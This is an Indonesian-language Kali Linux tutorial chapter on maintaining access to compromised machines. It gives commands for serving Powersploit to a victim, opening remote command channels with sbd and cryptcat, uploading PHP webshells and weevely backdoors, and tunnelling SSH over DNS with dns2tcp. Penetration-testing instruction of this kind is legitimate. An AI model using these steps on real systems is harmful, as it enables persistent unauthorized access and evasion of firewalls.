Kali Linux - Menjaga Akses

Dalam bab ini, kita akan melihat alat yang digunakan Kali untuk mempertahankan koneksi dan untuk akses ke mesin yang diretas bahkan ketika terhubung dan terputus lagi.

Powersploit

Ini adalah alat untuk mesin Windows. Ini memiliki PowerShell yang dipasang di mesin korban. Alat ini membantu peretas untuk terhubung dengan mesin korban melalui PowerShell.

Untuk membukanya, buka terminal di sebelah kiri dan ketik perintah berikut untuk masuk ke folder powersploit -

cd /usr/share/powersploit/

Jika Anda mengetik “ls”itu akan mencantumkan semua alat powersploit yang dapat Anda unduh dan instal di mesin korban setelah Anda mendapatkan akses. Kebanyakan dari mereka adalah nama menjelaskan sendiri menurut namanya.

Cara mudah untuk mendownload alat ini di mesin korban adalah dengan membuat server web, yang memungkinkan alat Powerploit untuk membuatnya dengan mudah menggunakan perintah berikut -

python -m SimpleHTTPServer

Setelah ini, jika Anda mengetik: http: // <Kali machine ip_address>: 8000 / berikut adalah hasilnya.

Sbd

sbd adalah alat yang mirip dengan Netcat. Ini portabel dan dapat digunakan di mesin Linux dan Microsoft. sbd menampilkan enkripsi AES-CBC-128 + HMAC-SHA1> Pada dasarnya, ini membantu untuk menyambung ke mesin korban kapan saja pada port tertentu dan mengirim perintah dari jarak jauh.

Untuk membukanya, pergi ke terminal dan ketik “sbd -l -p port” agar server menerima koneksi.

Dalam hal ini, mari kita letakkan port 44 di mana server akan mendengarkan.

Di situs korban, ketik “sbd IPofserver port”. Koneksi akan dibuat di mana kita dapat mengirim perintah jarak jauh.

Dalam hal ini, ini adalah "localhost" karena kami telah melakukan pengujian pada mesin yang sama.

Akhirnya, di server Anda akan melihat bahwa koneksi telah terjadi seperti yang ditunjukkan pada gambar layar berikut.

Webshell

Webshell dapat digunakan untuk mempertahankan akses atau meretas situs web. Tetapi kebanyakan dari mereka terdeteksi oleh antivirus. Shell php C99 sangat terkenal di antara antivirus. Antivirus umum apa pun akan dengan mudah mendeteksinya sebagai malware.

Secara umum, fungsi utamanya adalah mengirim perintah sistem melalui antarmuka web.

Untuk membukanya, dan ketik “cd /usr/share/webshells/” di terminal.

Seperti yang Anda lihat, mereka dibagi dalam kelas-kelas sesuai dengan bahasa program: asp, aspx, cfm, jsp, perl, php

Jika Anda masuk ke folder PHP, Anda dapat melihat semua webshell untuk halaman web php.

Untuk mengunggah shell ke server web, misalnya “simple-backdoor.php” buka halaman web dan URL dari web shell.

Terakhir, tulis perintah cmd. Anda akan memiliki semua info yang ditampilkan seperti pada tangkapan layar berikut.

Weevely

Weevely adalah shell web PHP yang mensimulasikan koneksi seperti telnet. Ini adalah alat untuk eksploitasi posting aplikasi web, dan dapat digunakan sebagai pintu belakang tersembunyi atau sebagai kerangka web untuk mengelola akun web yang sah, bahkan yang dihosting gratis.

Untuk membukanya, pergi ke terminal dan ketik "weevely" di mana Anda dapat melihat penggunaannya.

Untuk menghasilkan shell, ketik “weevely generate password pathoffile”. Seperti yang terlihat pada tangkapan layar berikut, ini dibuat di folder "Desktop" dan file akan diunggah di server web untuk mendapatkan akses.

Setelah mengunggah shell web seperti yang ditunjukkan pada gambar berikut, kita dapat terhubung dengan cmd ke server menggunakan perintah “weevely URL password” di mana Anda dapat melihat bahwa sesi telah dimulai.

http-tunnel

http-tunnel membuat aliran data virtual dua arah yang disalurkan dalam permintaan HTTP. Permintaan dapat dikirim melalui proxy HTTP jika diinginkan. Ini dapat berguna bagi pengguna di belakang firewall yang membatasi. Jika akses WWW diperbolehkan melalui proxy HTTP, dimungkinkan untuk menggunakan http-tunnel dan telnet atau PPP untuk terhubung ke komputer di luar firewall.

Pertama, kita harus membuat server terowongan dengan perintah berikut -

httptunnel_server –h

Kemudian, pada tipe situs klien “httptunnel_client –h” dan keduanya akan mulai menerima koneksi.

dns2tcp

Ini sekali lagi adalah alat tunneling yang membantu melewatkan lalu lintas TCP melalui Lalu Lintas DNS, yang berarti port UDP 53.

Untuk memulainya, ketik “dns2tcpd”. Penggunaannya dijelaskan saat Anda akan membuka skrip.

Di situs server, masukkan perintah ini untuk mengkonfigurasi file.

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

Di situs Klien, masukkan perintah ini.

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076

Tunneling akan dimulai dengan perintah ini.

cryptcat

Ini adalah alat lain seperti Netcat yang memungkinkan untuk membuat koneksi TCP dan UDP dengan mesin korban secara terenkripsi.

Untuk memulai server untuk mendengarkan koneksi, ketik perintah berikut -

cryptcat –l –p port –n

Dimana,

  • -l singkatan mendengarkan koneksi

  • -p singkatan dari parameter nomor port

  • -n singkatan tidak melakukan resolusi nama

Di situs klien, perintah koneksi adalah “cryptcat IPofServer PortofServer”